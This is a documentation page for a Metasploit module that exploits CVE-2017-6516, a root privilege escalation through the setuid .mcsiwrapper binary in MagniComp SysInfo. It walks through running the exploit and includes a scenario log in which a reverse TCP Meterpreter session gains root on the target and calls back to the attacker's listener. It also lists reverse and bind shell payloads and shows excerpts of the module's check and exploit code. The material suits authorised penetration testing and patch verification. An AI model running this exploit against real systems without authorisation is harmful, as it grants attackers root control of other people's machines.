MagniComp SysInfo mcsiwrapper Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: MagniComp SysInfo mcsiwrapper Privilege Escalation
Module: exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
Source code: modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb
Disclosure date: 2016-09-23
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux, Solaris
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2017-6516

This module attempts to gain root privileges on systems running MagniComp SysInfo versions prior to 10-H64. The .mcsiwrapper suid executable allows loading a config file using the '--configfile' argument. The 'ExecPath' config directive is used to set the executable load path. This module abuses this functionality to set the load path resulting in execution of arbitrary code as root. This module has been tested successfully with SysInfo version 10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
msf exploit(magnicomp_sysinfo_mcsiwrapper_priv_esc) > show targets
    ... a list of targets ...
msf exploit(magnicomp_sysinfo_mcsiwrapper_priv_esc) > set TARGET target-id
msf exploit(magnicomp_sysinfo_mcsiwrapper_priv_esc) > show options
    ... show and set options ...
msf exploit(magnicomp_sysinfo_mcsiwrapper_priv_esc) > set SESSION session-id
msf exploit(magnicomp_sysinfo_mcsiwrapper_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module attempts to gain root privileges on systems running MagniComp SysInfo versions prior to 10-H64.

Vulnerable Application


MagniComp SysInfo is a single system agent and viewer providing extensive IT asset inventory and configuration information for most major Linux, UNIX, Apple Macintosh, and Microsoft Windows platforms as well as leading NAS and SAN Storage Systems and logical volume software solutions.

The .mcsiwrapper suid executable allows loading a config file using the --configfile argument. The ExecPath config directive is used to set the executable load path. This module abuses this functionality to set the load path resulting in execution of arbitrary code as root.

This module has been tested successfully on SysInfo:

  • 10-GA on Solaris 10u11 x86
  • 10-H10 on Debian 8 x86_64
  • 10-H32 on Fedora 27 x86_64
  • 10-H63 on Fedora 20 x86_64

Installers:

  • https://www.magnicomp.com/cgi-bin/mcdownload.cgi
  • https://www.magnicomp.com/cgi-bin/mcdownload.cgi/Action=ListDDF

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: check
  6. Do: run
  7. You should get a new root session

Options


SESSION

Which session to use, which can be viewed with sessions

SYSINFO_DIR

Path to SysInfo directory (default: /opt/sysinfo)

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios


  msf > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc 
  msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > set session 1
  session => 1
  msf exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.244:4444 
  [*] Using target: Linux
  [*] Writing '/tmp/.0rk4PC/vFdxxuBVkh' (21 bytes) ...
  [*] Writing '/tmp/.0rk4PC/eoGVzYwGa' (207 bytes) ...
  [*] Executing payload...
  [*] Sending stage (857352 bytes) to 172.16.191.137
  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.137:42229) at 2018-02-05 07:38:35 -0500
  [+] Deleted /tmp/.0rk4PC/vFdxxuBVkh
  [+] Deleted /tmp/.0rk4PC/eoGVzYwGa
  [+] Deleted /tmp/.0rk4PC

  meterpreter > getuid
  Server username: uid=0, gid=1000, euid=1000, egid=1000
  meterpreter > sysinfo
  Computer     : localhost.localdomain
  OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > show info

       Name: MagniComp SysInfo mcsiwrapper Privilege Escalation
     Module: exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
   Platform: Linux, Solaris
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-09-23

Provided by:
  Daniel Lawson
  Romain Trouve
  bcoles <[email protected]>

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Solaris
  2   Linux

Check supported:
  Yes

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  SESSION                       yes       The session to run this module on.
  SYSINFO_DIR  /opt/sysinfo     yes       Path to SysInfo directory
  WritableDir  /tmp             yes       A directory where we can write files

Payload information:

Description:
  This module attempts to gain root privileges on systems running 
  MagniComp SysInfo versions prior to 10-H64. The .mcsiwrapper suid 
  executable allows loading a config file using the '--configfile' 
  argument. The 'ExecPath' config directive is used to set the 
  executable load path. This module abuses this functionality to set 
  the load path resulting in execution of arbitrary code as root. This 
  module has been tested successfully with SysInfo version 10-H63 on 
  Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on Debian 8 
  x86_64, and 10-GA on Solaris 10u11 x86.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-6516
  http://www.securityfocus.com/bid/96934
  http://www.magnicomp.com/support/cve/CVE-2017-6516.shtml
  https://labs.mwrinfosecurity.com/advisories/magnicomps-sysinfo-root-setuid-local-privilege-escalation-vulnerability/
  https://labs.mwrinfosecurity.com/advisories/multiple-vulnerabilities-in-magnicomps-sysinfo-root-setuid/

Module Options


This is a complete list of options available in the multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc exploit:

msf6 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > show options

Module options (exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION                       yes       The session to run this module on.
   SYSINFO_DIR  /opt/sysinfo     yes       Path to SysInfo directory
   WritableDir  /tmp             yes       A directory where we can write files

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc exploit:

msf6 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > show advanced

Module advanced options (exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc module can exploit:

msf6 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Solaris
   2   Linux

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc exploit:

msf6 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   19  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   20  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   22  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   23  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   26  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   27  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   30  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   31  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   32  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   33  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   34  payload/linux/x86/read_file                                        normal  No     Linux Read File
   35  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   36  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   37  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   38  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   41  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   42  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   45  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   46  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   47  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   48  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)
   49  payload/solaris/x86/shell_bind_tcp                                 normal  No     Solaris Command Shell, Bind TCP Inline
   50  payload/solaris/x86/shell_reverse_tcp                              normal  No     Solaris Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<MCSIWRAPPER_PATH> is not setuid


Here is a relevant code snippet related to the "<MCSIWRAPPER_PATH> is not setuid" error message:

75:	    end
76:	    vprint_good "Directory '#{sysinfo_dir}' exists"
77:	
78:	    mcsiwrapper_path = "#{sysinfo_dir}/bin/.mcsiwrapper"
79:	    unless setuid? mcsiwrapper_path
80:	      vprint_error "#{mcsiwrapper_path} is not setuid"
81:	      return CheckCode::Safe
82:	    end
83:	    vprint_good "#{mcsiwrapper_path} is setuid"
84:	
85:	    bash_path = cmd_exec 'which bash'

bash is not installed. Exploitation will fail.


Here is a relevant code snippet related to the "bash is not installed. Exploitation will fail." error message:

82:	    end
83:	    vprint_good "#{mcsiwrapper_path} is setuid"
84:	
85:	    bash_path = cmd_exec 'which bash'
86:	    unless bash_path.start_with?('/') && bash_path.include?('bash')
87:	      vprint_error 'bash is not installed. Exploitation will fail.'
88:	      return CheckCode::Safe
89:	    end
90:	    vprint_good 'bash is installed'
91:	
92:	    config_version = cmd_exec "grep ProdVersion= #{sysinfo_dir}/config/mcsysinfo.cfg"

Could not determine the SysInfo version


Here is a relevant code snippet related to the "Could not determine the SysInfo version" error message:

90:	    vprint_good 'bash is installed'
91:	
92:	    config_version = cmd_exec "grep ProdVersion= #{sysinfo_dir}/config/mcsysinfo.cfg"
93:	    version = config_version.scan(/^ProdVersion=(\d+-H\d+|\d+-GA)$/).flatten.first
94:	    if version.blank?
95:	      vprint_error 'Could not determine the SysInfo version'
96:	      return CheckCode::Detected
97:	    end
98:	    if Rex::Version.new(version.sub('-H', '.')) >= Rex::Version.new('10.64')
99:	      vprint_error "SysInfo version #{version} is not vulnerable"
100:	      return CheckCode::Safe

SysInfo version <VERSION> is not vulnerable


Here is a relevant code snippet related to the "SysInfo version <VERSION> is not vulnerable" error message:

94:	    if version.blank?
95:	      vprint_error 'Could not determine the SysInfo version'
96:	      return CheckCode::Detected
97:	    end
98:	    if Rex::Version.new(version.sub('-H', '.')) >= Rex::Version.new('10.64')
99:	      vprint_error "SysInfo version #{version} is not vulnerable"
100:	      return CheckCode::Safe
101:	    end
102:	    vprint_good "SysInfo version #{version} is vulnerable"
103:	
104:	    CheckCode::Vulnerable

Target is not vulnerable


Here is a relevant code snippet related to the "Target is not vulnerable" error message:

118:	  end
119:	
120:	  def exploit
121:	    check_status = check
122:	    if check_status != CheckCode::Vulnerable && check_status != CheckCode::Detected
123:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
124:	    end
125:	
126:	    # Set target
127:	    uname = cmd_exec 'uname'
128:	    vprint_status "Operating system is #{uname}"

Unable to automatically select a target


Here is a relevant code snippet related to the "Unable to automatically select a target" error message:

131:	      when /SunOS/i
132:	        my_target = targets[1]
133:	      when /Linux/i
134:	        my_target = targets[2]
135:	      else
136:	        fail_with Failure::NoTarget, 'Unable to automatically select a target'
137:	      end
138:	    else
139:	      my_target = target
140:	    end
141:	    print_status "Using target: #{my_target.name}"

Selected payload '<PAYLOAD_INSTANCE.NAME>' is not compatible with target operating system '<MY_TARGET.NAME>'


Here is a relevant code snippet related to the "Selected payload '<PAYLOAD_INSTANCE.NAME>' is not compatible with target operating system '<MY_TARGET.NAME>'" error message:

141:	    print_status "Using target: #{my_target.name}"
142:	
143:	    # Check payload
144:	    if (my_target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
145:	       (my_target['Platform'].eql?('solaris') && payload_instance.name !~ /solaris/i)
146:	      fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{my_target.name}'"
147:	    end
148:	
149:	    # Create a working directory
150:	    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric rand(5..10)}"
151:	    mkdir base_path

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Daniel Lawson
  • Romain Trouve
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.